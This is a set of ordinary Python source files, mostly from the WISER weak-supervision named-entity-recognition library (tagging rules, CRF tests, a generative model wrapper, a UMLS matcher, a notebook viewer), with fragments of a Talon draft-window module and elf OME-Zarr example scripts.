0: return [] # Find all the word spans matches = [] cursor_idx = None for match in word_matcher.finditer(text): matches.append(( match.start(), match.end() - len(match.group(2)), match.end() )) if matches[-1][0] <= cursor_position and matches[-1][2] >= cursor_position: cursor_idx = len(matches) - 1 # Now work out what range of those matches are getting an anchor. The aim is # to centre the anchors around the cursor position, but also to use all the # anchors. 
anchors_before_cursor = len(anchor_labels) // 2 anchor_start_idx = max(0, cursor_idx - anchors_before_cursor) anchor_end_idx = min(len(matches), anchor_start_idx + len(anchor_labels)) anchor_start_idx = max(0, anchor_end_idx - len(anchor_labels)) # Now add anchors to the selected matches for i, anchor in zip(range(anchor_start_idx, anchor_end_idx), anchor_labels): word_start, word_end, whitespace_end = matches[i] yield ( anchor, word_start, word_end, whitespace_end ) class DraftManager: """ API to the draft window """ def __init__(self): self.area = TextArea() self.area.title = "Talon Draft" self.area.value = "" self.area.register("label", self._update_labels) self.set_styling() def set_styling( self, theme="dark", text_size=20, label_size=20, label_color=None ): """ Allow settings the style of the draft window. Will dynamically update the style based on the passed in parameters. """ area_theme = DarkThemeLabels if theme == "dark" else LightThemeLabels theme_changes = { "text_size": text_size, "label_size": label_size, } if label_color is not None: theme_changes["label"] = label_color self.area.theme = area_theme(**theme_changes) def show(self, text: Optional[str] = None): """ Show the window. If text is None then keep the old contents, otherwise set the text to the given value. """ if text is not None: self.area.value = text self.area.show() def hide(self): """ Hide the window. """ self.area.hide() def get_text(self) -> str: """ Gets the context of the text area """ return self.area.value def get_rect(self) -> "talon.types.Rect": """ Get the Rect for the window """ return self.area.rect def reposition( self, xpos: Optional[int] = None, ypos: Optional[int] = None, width: Optional[int] = None, height: Optional[int] = None, ): """ Move the window or resize it without having to change all properties. """ rect = self.area.rect if xpos is not None: rect.x = xpos if ypos is not None: rect.y = ypos if width is not None: rect.width = width if height is not None: rect.height = height self.area.rect = rect def select_text( self, start_anchor, end_anchor=None, include_trailing_whitespace=False ): """ Selects the word corresponding to start_anchor. If end_anchor supplied, selects from start_anchor to the end of end_anchor. If include_trailing_whitespace=True then also selects trailing space characters (useful for delete). """ start_index, end_index, last_space_index = self.anchor_to_range(start_anchor) if end_anchor is not None: _, end_index, last_space_index = self.anchor_to_range(end_anchor) if include_trailing_whitespace: end_index = last_space_index self.area.sel = Span(start_index, end_index) def position_caret(self, anchor, after=False): """ Positions the caret before the given anchor. If after=True position it directly after. 
""" start_index, end_index, _ = self.anchor_to_range(anchor) index = end_index if after else start_index self.area.sel = index def anchor_to_range(self, anchor): anchors_data = calculate_text_anchors(self._get_visible_text(), self.area.sel.left) for loop_anchor, start_index, end_index, last_space_index in anchors_data: if anchor == loop_anchor: return (start_index, end_index, last_space_index) raise RuntimeError(f"Couldn't find anchor {anchor}") def _update_labels(self, _visible_text): """ Updates the position of the labels displayed on top of each word """ anchors_data = calculate_text_anchors(self._get_visible_text(), self.area.sel.left) return [ (Span(start_index, end_index), anchor) for anchor, start_index, end_index, _ in anchors_data ] def _get_visible_text(self): # Placeholder for a future method of getting this return self.area.value if False: # Some code for testing, change above False to True and edit as desired draft_manager = DraftManager() draft_manager.show( "This is a line of text\nand another line of text and some more text so that the line gets so long that it wraps a bit.\nAnd a final sentence" ) draft_manager.reposition(xpos=100, ypos=100) draft_manager.select_text("c") ```
{ "source": "aabayarea/wiser", "score": 3 }
#### File: test/integration_tests/hmm.py
```python
from wiser.data.dataset_readers import MediaDatasetReader
from wiser.viewer import Viewer

dataset_reader = MediaDatasetReader()
train_data = dataset_reader.read('data/wikipedia/unlabeled_train.csv')
dev_data = dataset_reader.read('data/wikipedia/labeled_dev.csv')
test_data = dataset_reader.read('data/wikipedia/labeled_test.csv')

# In this tutorial we will use only the first 10 instances of each partition
train_data = train_data[:10]
dev_data = dev_data[:10]
test_data = test_data[:10]

# We must merge all partitions to apply the rules
data = train_data + dev_data + test_data

from wiser.rules import TaggingRule


class MovieYear(TaggingRule):

    def apply_instance(self, instance):

        # Creates a list of tokens
        tokens = [t.text for t in instance['tokens']]

        # Initializes a list of ABS (abstain) label votes
        labels = ['ABS'] * len(tokens)

        for i in range(len(tokens)-2):
            # Tags proper nouns followed by a number between parentheses
            if tokens[i].istitle() and tokens[i+1] == '(' and tokens[i+2].isdigit():
                labels[i] = 'I-PERF'

        # Returns the modified label vote list
        return labels


# Applies the tagging rule to all dataset instances
tr = MovieYear()
tr.apply(data)

from wiser.eval.util import tagging_rule_errors

mistakes = tagging_rule_errors(dev_data, 'MovieYear', error_type='fp', mode='span')

from wiser.eval import score_tagging_rules

score_tagging_rules(dev_data)

from wiser.rules import LinkingRule


class ConsecutiveCapitals(LinkingRule):

    def apply_instance(self, instance):
        tokens = [t.text for t in instance['tokens']]
        links = [0] * len(tokens)

        for i in range(1, len(tokens)):
            if tokens[i].istitle() and tokens[i-1].istitle():
                links[i] = 1    # token at index "i" shares tag with token at index "i-1"

        return links


lr = ConsecutiveCapitals()
lr.apply(data)

from wiser.eval import score_linking_rules

score_linking_rules(dev_data)

from wiser.rules import remove_rule


class DummyRule(TaggingRule):

    def apply_instance(self, instance):
        tokens = [t.text for t in instance['tokens']]
        return ['ABS'] * len(tokens)


tr = DummyRule()
tr.apply(data)

remove_rule(data, 'DummyRule')  # Don't forget to pass the entire dataset

score_tagging_rules(dev_data)

from wiser.eval import score_labels_majority_vote

score_labels_majority_vote(dev_data)

from labelmodels import HMM
from wiser.generative import Model

model = Model(HMM, init_acc=0.95, acc_prior=50, balance_prior=100)

from labelmodels import LearningConfig

config = LearningConfig()
config.epochs = 5

# Outputs the best development score
model.train(config, train_data=train_data, dev_data=dev_data)

model.evaluate(test_data)

model.save_output(data=train_data, path='output/generative/hmm/train_data.p', save_distribution=True)
model.save_output(data=dev_data, path='output/generative/hmm/dev_data.p', save_distribution=True, save_tags=True)
model.save_output(data=test_data, path='output/generative/hmm/test_data.p', save_distribution=True, save_tags=True)

from wiser.data.dataset_readers import weak_label    # You need to import weak_label and WiserCrfTagger
from wiser.models import WiserCrfTagger              # since they are used in the training config file
from allennlp.commands.train import train_model_from_file

train_model_from_file(parameter_filename='../../test/integration_tests/IT2.jsonnet',
                      serialization_dir='output/discriminative/hmm',
                      file_friendly_logging=True,
                      force=True)

from allennlp.predictors.predictor import Predictor
from allennlp.data.tokenizers.word_splitter import SpacyWordSplitter

predictor = Predictor.from_path(archive_path='output/discriminative/hmm/model.tar.gz',
                                predictor_name='sentence-tagger')

tokenizer = SpacyWordSplitter(language='en_core_web_sm', pos_tags=False)

sentence = 'The movie The Lord of the Rings: The Return of the King (2003) \
            won all 11 awards for which it was nominated, \
            including the Academy Award for Best Picture'

# Prints all tokens in the sentence, alongside their predicted tags
for match in zip(tokenizer.split_words(sentence), predictor.predict(sentence)['tags']):
    print(match)
```
#### File: test/modules/test_conditional_random_field.py
```python
import math
import numpy as np
import torch
from torch import optim
import unittest

from wiser.modules import WiserConditionalRandomField


class TestWiserConditionalRandomField(unittest.TestCase):
    def setUp(self):
        """
        Sets all random seeds before each test.
        """
        seed = 0
        torch.backends.cudnn.deterministic = True
        np.random.seed(seed)
        torch.manual_seed(seed)
        torch.cuda.manual_seed(seed)

    def test_distribution_learning_matches(self):
        """
        Trains two CRFs on the same data, once represented as tags and once
        represented as a distribution, in order to test learning via
        maximizing expected_log_likelihood. Test passes iff learned parameters
        of two CRFs match.
        """
        num_labels = 3
        num_examples = 100
        min_seq_len = 8
        max_seq_len = 12

        logits = torch.Tensor([-0.5, -.25, 0])
        transitions = torch.eye(3)
        start = torch.Tensor([0.25, 0, 0.25])
        start -= torch.max(start)
        end = start

        tags, mask = _generate_data(
            num_examples, min_seq_len, max_seq_len,
            logits, transitions, start, end)

        # Trains first CRF on tags
        crf1 = LinearCrf(num_labels)
        # Initializes all weights to zero so we can compare with other CRF
        torch.nn.init.zeros_(crf1.linear)
        torch.nn.init.zeros_(crf1.transitions)
        torch.nn.init.zeros_(crf1.start_transitions)
        torch.nn.init.zeros_(crf1.end_transitions)
        _train_crf_tags(crf1, tags, mask, 50, 32)

        # Converts tags to exact distribution
        distribution = torch.zeros(tags.shape[0], tags.shape[1], num_labels)
        for i in range(tags.shape[0]):
            for j in range(tags.shape[1]):
                distribution[i, j, tags[i, j]] = 1.0

        # Trains second CRF on distribution
        crf2 = LinearCrf(num_labels)
        torch.nn.init.zeros_(crf2.linear)
        torch.nn.init.zeros_(crf2.transitions)
        torch.nn.init.zeros_(crf2.start_transitions)
        torch.nn.init.zeros_(crf2.end_transitions)
        _train_crf_distribution(crf2, distribution, mask, 50, 32)

        # Tests that all parameters match
        self.assertLess(torch.norm(crf1.linear - crf2.linear), 1e-3)
        self.assertLess(torch.norm(crf1.transitions - crf2.transitions), 1e-3)
        self.assertLess(torch.norm(crf1.start_transitions - crf2.start_transitions), 1e-3)
        self.assertLess(torch.norm(crf1.end_transitions - crf2.end_transitions), 1e-3)


class LinearCrf(WiserConditionalRandomField):
    """Wraps WiserConditionalRandomField to learn fixed logits for each sequence element."""
    def __init__(self, num_tags):
        super().__init__(num_tags, None, True)
        self.linear = torch.nn.Parameter(torch.Tensor(num_tags))
        torch.nn.init.normal_(self.linear)

    def forward(self,
                tags: torch.Tensor,
                mask: torch.ByteTensor = None) -> torch.Tensor:
        # pylint: disable=arguments-differ
        return super().forward(
            self.linear.repeat(tags.shape[0],
tags.shape[1], 1), tags, mask ) def expected_log_likelihood( self, distribution: torch.Tensor, mask: torch.ByteTensor = None) -> torch.Tensor: # pylint: disable=arguments-differ return super().expected_log_likelihood( self.linear.repeat(distribution.shape[0], distribution.shape[1], 1), mask, distribution ) def _train_crf_tags(crf, tags, mask, epochs, batch_size): num_batches = math.ceil(tags.shape[0] / batch_size) optimizer = optim.Adam(crf.parameters()) for _ in range(epochs): for i in range(num_batches): batch_tags = tags[i * batch_size:(i+1) * batch_size] batch_mask = mask[i * batch_size:(i+1) * batch_size] crf.zero_grad() loss = -crf(batch_tags, batch_mask) loss.backward() optimizer.step() def _train_crf_distribution(crf, distribution, mask, epochs, batch_size): num_batches = math.ceil(distribution.shape[0] / batch_size) optimizer = optim.Adam(crf.parameters()) for _ in range(epochs): for i in range(num_batches): batch_distribution = distribution[i * batch_size:(i + 1) * batch_size] batch_mask = mask[i * batch_size:(i + 1) * batch_size] crf.zero_grad() loss = -crf.expected_log_likelihood(batch_distribution, batch_mask) loss.backward() optimizer.step() def _generate_data(num_examples, min_seq_len, max_seq_len, logits, transitions, start, end): tags = torch.zeros((num_examples, max_seq_len), dtype=torch.long) mask = torch.zeros((num_examples, max_seq_len), dtype=torch.long) for i in range(num_examples): seq_len = np.random.randint(min_seq_len, max_seq_len + 1) seq = _generate_seq(seq_len, logits, transitions, start, end) for j in range(seq_len): tags[i, j] = seq[j] mask[i, j] = 1 return tags, mask def _generate_seq(seq_len, logits, transitions, start, end, gibbs_rounds=5): seq = torch.zeros((seq_len,), dtype=torch.long) # Randomly initializes the sequence for i in range(seq_len): seq[i] = np.random.randint(logits.shape[0]) # Performs rounds of Gibbs sampling p = torch.zeros((logits.shape[0],)) for _ in range(gibbs_rounds): for i in range(seq_len): if i == 0: # Neighbor only on right p[:] = logits p += transitions[:, seq[i+1]] p += start elif i == seq_len - 1: # Neighbor only on left p[:] = logits p += transitions[seq[i-1], :] p += end else: # Neighbors on both sides p[:] = logits p += transitions[seq[i-1], :] p += transitions[:, seq[i + 1]] p = torch.exp(p - torch.max(p)) p = p / torch.sum(p) seq[i] = float(np.argmax(np.random.multinomial(1, p))) # print(seq) return seq if __name__ == '__main__': unittest.main() ``` #### File: wiser/generative/model.py ```python from wiser.generative import get_label_to_ix, get_rules, train_generative_model, evaluate_generative_model, clean_inputs, get_predictions_generative_model from wiser.data import save_label_distribution from wiser.eval import get_generative_model_inputs class Model: def __init__(self, model_module, init_acc=0.9, acc_prior=50, balance_prior=100, reinitialize=True): """ Initializes a predefined generative model using the given parameters :param model_module labelmodel class of generative model to be initialized :param init_acc: initial estimated tagging and linking rule accuracy, also used as the mean of the prior distribution of the model parameters :param acc_prior: weight of the regularizer pulling tagging and linking rule accuracies toward their initial values. :param balance_prior: used to regularize the class prior in naiveBayes or the initial class distribution for HMM and linkedHMM, as well as the transition matrix in those methods, towards a more uniform distribution. 
:reinitialize: used to determine if the model should reinitialize weights upon sequential calls of model.train """ self.model_module = model_module self.model_type = model_module.__name__ self.init_acc = init_acc self.acc_prior = acc_prior self.balance_prior = balance_prior self.reinitialize = reinitialize self.gen_label_to_ix = None self.disc_label_to_ix = None self.model = None def train(self, config, train_data, dev_data): """ Trains the generative model :param train_data: array of AllenNLP instances used as training samples :param dev_data: array of labeled AllenNLP instances used as development samples :param config: labelmodel config specifying training configuration """ self.gen_label_to_ix, self.disc_label_to_ix = get_label_to_ix(train_data + dev_data) tagging_rules, linking_rules = get_rules(train_data + dev_data) if (self.model_type == 'NaiveBayes' or self.model_type == 'HMM') and (self.model == None or self.reinitialize): self.model = self.model_module(len(self.gen_label_to_ix) - 1, len(tagging_rules), self.init_acc, self.acc_prior, self.balance_prior) elif self.model_type == 'LinkedHMM' and (self.model == None or self.reinitialize): self.model = self.model_module(len(self.gen_label_to_ix) - 1, len(tagging_rules), len(linking_rules), self.init_acc, self.acc_prior, self.balance_prior) elif not self.model_type in ['NaiveBayes', 'HMM', 'LinkedHMM']: raise ValueError("Unknown model type: %s" % str(type(self.model_type))) p, r, f1 = train_generative_model(self.model, train_data, dev_data, label_to_ix=self.gen_label_to_ix, config=config) # Prints development precision, recall, and F1 scores return p, r, f1 def evaluate(self, data): """ Evaluates the generative model :param data: array of labeled AllenNLP instances used as evaluation samples """ if self.model is None: raise ValueError("You need to train the generative model before evaluating it's output.") return evaluate_generative_model(model=self.model, data=data, label_to_ix=self.gen_label_to_ix) def get_predictions(self, data): """ Gets predictions for the generative model for an input sentence :param data: array of labeled AllenNLP instances used as evaluation samples """ if self.model is None: raise ValueError("You need to train the generative model before evaluating it's output.") return get_predictions_generative_model(model=self.model, data=data, label_to_ix=self.gen_label_to_ix) def save_output(self, data, path, save_distribution=True, save_tags=True): """ Saves the probabilistic output of the generative model :param data: array of labeled AllenNLP instances used as evaluation samples :param path: path to save the data to :param save_distribution: boolean indicating to save the probabilistic distrubution :param save_tags: boolean indicating to save the true tags (if any) """ if self.model is None: raise ValueError("You need to train the generative model before saving the output to disk.") inputs = clean_inputs(get_generative_model_inputs(data, self.gen_label_to_ix), self.model) if save_distribution: if self.model_type == "NaiveBayes": dist = self.model.get_label_distribution(*inputs) save_label_distribution(path, data, unary_marginals=dist, gen_label_to_ix=self.gen_label_to_ix, disc_label_to_ix=self.disc_label_to_ix, save_tags=save_tags) else: p_unary, p_pairwise = self.model.get_label_distribution(*inputs) save_label_distribution(path, data, unary_marginals=p_unary, pairwise_marginals=p_pairwise, gen_label_to_ix=self.gen_label_to_ix, disc_label_to_ix=self.disc_label_to_ix, save_tags=save_tags) else: 
save_label_distribution(path, data, save_tags) ``` #### File: wiser/wiser/rules.py ```python from tqdm.auto import tqdm def remove_rule(data, name): """ Removes a tagging or linking rule from a given dataset """ for instance in data: if name in instance['WISER_LABELS']: del instance['WISER_LABELS'][name] if name in instance['WISER_LINKS']: del instance['WISER_LINKS'][name] class TaggingRule: def apply(self, instances): for instance in tqdm(instances): # Initializes metadata field if self._get_metadata_field() not in instance: instance.add_field(self._get_metadata_field(), {}) # Labels the instance labels = self.apply_instance(instance) # Stores the labels in the instance instance[self._get_metadata_field()][self._get_tr_name()] = labels def apply_instance(self, instance): raise NotImplementedError def _get_metadata_field(self): return "WISER_LABELS" def _get_tr_name(self): return type(self).__name__ class LinkingRule(TaggingRule): def apply_instance(self, instance): raise NotImplementedError def _get_metadata_field(self): return "WISER_LINKS" class DictionaryMatcher(TaggingRule): def __init__(self, name, terms, uncased=False, match_lemmas=False, i_label="I", abs_label="ABS"): self.name = name self.uncased = uncased self.match_lemmas = match_lemmas self.i_label = i_label self.abs_label = abs_label self._load_terms(terms) def apply_instance(self, instance): tokens = self._normalize_instance_tokens(instance['tokens']) labels = [self.abs_label] * len(instance['tokens']) # Checks whether any terms in the dictionary appear in the instance i = 0 while i < len(tokens): if tokens[i] in self.term_dict: candidates = self.term_dict[tokens[i]] for c in candidates: # Checks whether normalized AllenNLP tokens equal the list # of string tokens defining the term in the dictionary if i + len(c) <= len(tokens): equal = True for j in range(len(c)): if tokens[i + j] != c[j]: equal = False break # If tokens match, labels the instance tokens if equal: for j in range(i, i + len(c)): labels[j] = self.i_label i = i + len(c) - 1 break i += 1 # Additionally checks lemmas if requested. 
This will not overwrite # existing votes if self.match_lemmas: tokens = self._normalize_instance_tokens(instance['tokens'], lemmas=True) i = 0 while i < len(tokens): if tokens[i] in self.term_dict: candidates = self.term_dict[tokens[i]] for c in candidates: # Checks whether normalized AllenNLP tokens equal the list # of string tokens defining the term in the dictionary if i + len(c) <= len(tokens): equal = True for j in range(len(c)): if tokens[i + j] != c[j] or labels[i + j] != self.abs_label: equal = False break # If tokens match, labels the instance tokens using map if equal: for j in range(i, i + len(c)): labels[j] = self.i_label i = i + len(c) - 1 break i += 1 return labels def _get_tr_name(self): return self.name def _normalize_instance_tokens(self, tokens, lemmas=False): if lemmas: normalized_tokens = [token.lemma_ for token in tokens] else: normalized_tokens = [token.text for token in tokens] if self.uncased: normalized_tokens = [token.lower() for token in normalized_tokens] return normalized_tokens def _normalize_terms(self, tokens): if self.uncased: return [token.lower() for token in tokens] return tokens def _load_terms(self, terms): self.term_dict = {} for term in terms: normalized_term = self._normalize_terms(term) if normalized_term[0] not in self.term_dict: self.term_dict[normalized_term[0]] = [] self.term_dict[normalized_term[0]].append(normalized_term) # Sorts the terms in decreasing order so that we match the longest first for first_token in self.term_dict.keys(): to_sort = self.term_dict[first_token] self.term_dict[first_token] = sorted( to_sort, reverse=True, key=lambda x: len(x)) ``` #### File: wiser/wiser/umls.py ```python import itertools import os from .rules import DictionaryMatcher class UMLSMatcher(DictionaryMatcher): def __init__( self, name, path, sem_types, additional_stop_words=None, max_tokens=4, i_label="I", abs_label="ABS"): # Collects concept IDs of the requested semtantic type(s) CUIs = set() sem_type_file = os.path.join(path, 'META', 'MRSTY.RRF') with open(sem_type_file, 'r') as f: for line in f.readlines(): data = line.strip().split('|') if data[3] in sem_types: CUIs.add(data[0]) # Collects all English terms corresponding to the collected concepts terms = set() name_file = os.path.join(path, 'META', 'MRXNS_ENG.RRF') with open(name_file, 'r') as f: for line in f.readlines(): data = line.strip().split('|') if data[2] in CUIs and len(data[1].split(' ')) <= max_tokens: terms.add(data[1]) # Removes stop words that are too common from terms self._filter_stop_words(terms, additional_stop_words) # Tokenizes the UMLS terms terms = [term.split(' ') for term in terms] # Creates reordered copies of terms for common groups, # e.g., "cancer ovarian" -> "ovarian cancer" self._expand_terms(terms) # Finished intializing the tagging rule super(UMLSMatcher, self).__init__( name, terms, match_lemmas=True, i_label=i_label, abs_label=abs_label) def _normalize_instance_tokens(self, tokens, lemmas=False): if lemmas: normalized_tokens = [token.lemma_ for token in tokens] else: normalized_tokens = [token.text.lower() for token in tokens] return normalized_tokens def _expand_terms(self, terms): new_terms = set() for term in terms: for new_term in itertools.permutations(term): new_terms.add(" ".join(new_term)) terms.extend(term.split(' ') for term in new_terms) def _filter_stop_words(self, terms, additional_stop_words): """ We remove terms that appear in UMLS that are unlikely to be terms of interest (by themselves) for NER. 
Users who want to change this behavior can override this method. :param terms: :param additional_stop_words: """ stop_words = { "a", "abated", "active", "age", "aged", "agent", "advantage", "aid", "aided", "aim", "air", "al", "alert", "all", "an", "animal", "as", "ascending", "at", "atm", "avid", "b", "balance", "base", "basic", "basis", "be", "blockade", "bp", "but", "c", "came", "can", "cards", "color", "combination", "conclude", "concluded", "condition", "contrast", "control", "counter", "critically", "culture", "d", "damage", "date", "de", "defect", "deletion", "delivered", "direct", "disease", "disorder", "doctor", "dose", "doses", "drug", "duplication", "duration", "e", "electron", "element", "elements", "end", "et", "evaluable", "exposure", "f", "factor", "family", "favor", "favored", "feeding", "finding", "food", "g", "glomerular", "grade", "green", "group", "h", "he", "her", "hers", "hg", "hh", "his", "i", "ii", "if", "in", "inactive", "ingredient", "injection", "inner", "ion", "is", "isotope", "j", "k", "l", "label", "leading", "level", "light", "m", "man", "march", "mass", "matrix", "mediate", "medication", "men", "messenger", "met", "mimic", "ml", "mg", "mm", "mutant", "mutation", "n", "neuroleptic", "no", "nonsense", "o", "opioid", "or", "oral", "other", "p", "perform", "personality", "placebo", "plan", "planned", "plasma", "pool", "prevent", "probe", "program", "prompt", "prove", "pseudo", "purpose", "psychotropic", "q", "r", "react", "receptor", "recruitment", "relate", "relates", "related", "relief", "rise", "rose", "rr", "run", "runs", "s", "same", "se", "sham", "smell", "so", "solution", "solid", "spared", "stain", "suffer", "support", "sustain", "syndrome", "t", "ten", "therapeutic", "tilt", "to", "tonic", "transition", "triad", "tricyclic", "tubular", "u", "unknown", "us", "v", "various", "vessel", "w", "was", "water", "were", "worse", "x", "y", "z" } if additional_stop_words is not None: for stop_word in additional_stop_words: stop_words.add(stop_word) for stop_word in stop_words: if stop_word in terms: terms.remove(stop_word) ``` #### File: wiser/viewer/viewer.py ```python try: from IPython.core.display import display, Javascript except ModuleNotFoundError: raise Exception("This module requires IPython.") import os import ipywidgets as widgets from traitlets import Unicode directory = os.path.abspath(os.path.dirname(__file__)) PAGE_HTML = u""" <div class="viewer-page" id="viewer-page-{id}-{source}"{etc}> {data} </div> """ SOURCE_OPTION_HTML = u""" <option value="{value}">{name}</option> """ class Viewer(widgets.DOMWidget): """Viewer for instances and associated labels.""" _view_name = Unicode('ViewerView').tag(sync=True) _view_module = Unicode('viewer').tag(sync=True) _view_module_version = Unicode('0.1.0').tag(sync=True) html = Unicode('<h3>Error rendering Viewer!</h3>').tag(sync=True) _labels_serialized = Unicode().tag(sync=True) def __init__(self, instances, height=300, additional_labels=None): super(Viewer, self).__init__() self.instances = instances self.n_instances = len(instances) self.height = height if additional_labels is not None: self.additional_labels = additional_labels else: self.additional_labels = {} # display js, construct html and pass on to widget model self.render() def render(self): """Renders viewer pane""" # Collects all labeling function names. We assume that all instances # in the collection are labeled by the same functions. 
if 'WISER_LABELS' in self.instances[0]: lf_names = sorted(self.instances[0]['WISER_LABELS'].keys()) else: lf_names = [] # Also sorts names of any additional label sources additional_names = sorted(self.additional_labels.keys()) # Renders all pages pages = [] first = True for i, instance in enumerate(self.instances): # Collects labels for instance labels = [instance['tags']] for name in additional_names: labels.append(self.additional_labels[name][i]) for lf_name in lf_names: labels.append(instance['WISER_LABELS'][lf_name]) for j, label_seq in enumerate(labels): rendered_instance = self._render_instance(instance, label_seq) pages.append(PAGE_HTML.format( data=rendered_instance, id=i, source=j, etc=' style="display: block;"' if first else '' )) first = False # Renders the label source options source_options = [SOURCE_OPTION_HTML.format(value=0, name="Gold Labels")] offset = 1 for i, name in enumerate(additional_names): source_options.append( SOURCE_OPTION_HTML.format(value=i+offset, name=name)) offset += len(additional_names) for i, lf_name in enumerate(lf_names): source_options.append( SOURCE_OPTION_HTML.format(value=i+offset, name=lf_name)) # Render in Viewer template self.html = open(os.path.join(directory, 'viewer.html')).read()\ % (self.height, ''.join(pages), ''.join(source_options)) display(Javascript(open(os.path.join(directory, 'viewer.js')).read())) def _render_instance(self, instance, labels): if len(instance['tokens']) != len(labels): raise ValueError("Number of tokens does not match number of labels") html = [] active_span = False for i in range(len(instance['tokens'])): if (labels[i][0] == 'I' and not active_span) or labels[i][0] == 'B': if labels[i][0] == 'B': html.append("</span>") html.append(" ") title = "Entity" if len(labels[i]) <= 2 else labels[i][2:] html.append("<span class='active' title='%s'>" % title) active_span = True elif labels[i][0] == 'O' or labels[i] == 'ABS': if active_span: html.append("</span>") html.append(" ") active_span = False else: html.append(" ") html.append(instance['tokens'][i].text) # Closes span if still active if active_span: html.append("</span>") return ''.join(html) ```
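The `Viewer` above is an ipywidgets `DOMWidget`, so it only renders inside a Jupyter notebook. Below is a minimal driving sketch; the `Token` namedtuple and the single dict instance are hypothetical stand-ins for the AllenNLP instances the real WISER pipeline produces (the widget only needs a `'tokens'` sequence whose items expose `.text`, a `'tags'` sequence, and optionally a `'WISER_LABELS'` mapping).

```python
from collections import namedtuple

Token = namedtuple("Token", ["text"])  # stand-in for a spaCy/AllenNLP token

instances = [
    {
        "tokens": [Token("Severe"), Token("asthma"), Token("observed")],
        "tags": ["O", "I", "O"],                                   # gold tag sequence
        "WISER_LABELS": {"CoreDictionary": ["ABS", "I", "ABS"]},   # votes of one tagging rule
    }
]

# In a notebook cell, constructing the widget renders the pages; the last
# expression of the cell displays it.
viewer = Viewer(instances, height=200)
viewer
```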
{ "source": "aabbas90/elf", "score": 2 }
#### File: example/io/ngff_examples.py ```python import argparse import os import imageio import numpy as np from elf.io import open_file from elf.io.ngff import write_ome_zarr def _kwargs_2d(): return {"scale": (0.5, 0.5), "order": 0, "preserve_range": True} def _kwargs_3d(): return {"scale": (0.5, 0.5, 0.5), "order": 0, "preserve_range": True} def _load_data(path, key, bb): if key is None: data = imageio.volread(path) data = data[bb] else: with open_file(path, 'r') as f: data = f[key][bb] return data def _create_example(in_path, folder, axes, key=None, bb=np.s_[:], dimension_separator="/"): ax_name = ''.join(axes) if dimension_separator == "/": out_path = os.path.join(folder, f"{ax_name}.ome.zarr") else: out_path = os.path.join(folder, f"flat_{ax_name}.ome.zarr") if os.path.exists(out_path): print("Example data at", out_path, "is already present") return data = _load_data(in_path, key, bb) assert data.ndim == len(axes) kwargs = _kwargs_3d() if axes[-3:] == ('z', 'y', 'x') else _kwargs_2d() write_ome_zarr(data, out_path, axes, ax_name, n_scales=3, kwargs=kwargs, dimension_separator=dimension_separator) # # create ngff ome.zarr example data # # all the filepath are hard-coded to the EMBL kreshuk group share # axes: yx def create_2d_example(folder): # yx: covid htm data with only nucleus channel in_path = os.path.join("/g/kreshuk/data/covid/covid-data-vibor/20200405_test_images", "WellC01_PointC01_0000_ChannelDAPI,WF_GFP,TRITC,WF_Cy5_Seq0216.tiff") _create_example(in_path, folder, axes=("y", "x"), bb=np.s_[0, :, :]) def _make_t_volume(path, timepoints, out_path, scale=2): if os.path.exists(out_path): return data = [] for tp in timepoints: key = f'setup0/timepoint{tp}/s{scale}' with open_file(path, 'r') as f: d = f[key][:] data.append(d[None]) data = np.concatenate(data, axis=0) with open_file(out_path, 'w') as f: f.create_dataset('data', data=data, chunks=(1, 64, 64, 64)) # TODO add linked labels for the zyx example # axes: zyx, cyx, tyx def create_3d_examples(folder): # zyx: covid em data + labels raw_path = os.path.join('/g/kreshuk/pape/Work/mobie/covid-em-datasets/data', 'Covid19-S4-Area2/images/local/sbem-6dpf-1-whole-raw.n5') raw_key = 'setup0/timepoint0/s3' _create_example(raw_path, folder, axes=("z", "y", "x"), key=raw_key) # for linked labels # seg_path = os.path.join('/g/kreshuk/pape/Work/mobie/covid-em-datasets/data', # 'Covid19-S4-Area2/images/local/s4_area2_segmentation.n5') # seg_key = 'setup0/timepoint0/s3' # cyx: covid htm data with more channels in_path = os.path.join("/g/kreshuk/data/covid/covid-data-vibor/20200405_test_images", "WellC01_PointC01_0000_ChannelDAPI,WF_GFP,TRITC,WF_Cy5_Seq0216.tiff") _create_example(in_path, folder, axes=("c", "y", "x"), bb=np.s_[:3, :, :]) # tyx: middle slice from arabidopsis dataset timepoints = [32, 33, 34] scale = 2 raw_path = os.path.join('/g/kreshuk/pape/Work/mobie/arabidopsis-root-lm-datasets/data', 'arabidopsis-root/images/local/lm-membranes.n5') tmp_path = './tp_data.h5' _make_t_volume(raw_path, timepoints, tmp_path, scale=scale) _create_example(tmp_path, folder, axes=("t", "y", "x"), bb=np.s_[:, 200, :, :], key='data') def _make_tc_volume(path1, path2, timepoints, out_path, scale=2): if os.path.exists(out_path): return data = [] for tp in timepoints: key = f'setup0/timepoint{tp}/s{scale}' with open_file(path1, 'r') as f: d1 = f[key][:] with open_file(path2, 'r') as f: d2 = f[key][:] d = np.concatenate([d1[None], d2[None]], axis=0) data.append(d[None]) data = np.concatenate(data, axis=0) with open_file(out_path, 'w') as f: 
f.create_dataset('data', data=data, chunks=(1, 1, 64, 64, 64)) # axes: tzyx, tcyx, czyx def create_4d_examples(folder): # tzyx: arabidopsis dataset (boundaries) tmp_path = './tp_data.h5' _create_example(tmp_path, folder, key="data", axes=("t", "z", "y", "x"), bb=np.s_[:]) # tcyx: arabidopsis boundaries and nuclei, middle slice timepoints = [32, 33, 34] scale = 2 path1 = '/g/kreshuk/pape/Work/mobie/arabidopsis-root-lm-datasets/data/arabidopsis-root/images/local/lm-membranes.n5' path2 = '/g/kreshuk/pape/Work/mobie/arabidopsis-root-lm-datasets/data/arabidopsis-root/images/local/lm-nuclei.n5' tmp_path = './tp_channel_data.h5' _make_tc_volume(path1, path2, timepoints, tmp_path, scale=scale) _create_example(tmp_path, folder, key="data", axes=("t", "c", "y", "x"), bb=np.s_[:, :, 200, :, :]) # czyx: arabidopsis dataset (boundaries + nuclei), single timepoint _create_example(tmp_path, folder, key="data", axes=("c", "z", "y", "x"), bb=np.s_[0, :, :, :, :]) # axes: tczyx def create_5d_example(folder): # tczyx: full arabidopsis dataset tmp_path = './tp_channel_data.h5' _create_example(tmp_path, folder, key="data", axes=("t", "c", "z", "y", "x"), bb=np.s_[:, :, :, :, :]) # using '.' dimension separator def create_flat_example(folder): # yx: covid htm data with only nucleus channel in_path = os.path.join("/g/kreshuk/data/covid/covid-data-vibor/20200405_test_images", "WellC01_PointC01_0000_ChannelDAPI,WF_GFP,TRITC,WF_Cy5_Seq0216.tiff") _create_example(in_path, folder, axes=("y", "x"), bb=np.s_[0, :, :], dimension_separator=".") def copy_readme(output_folder, version): readme = f""" # Example data for OME-ZARR NGFF v{version} This 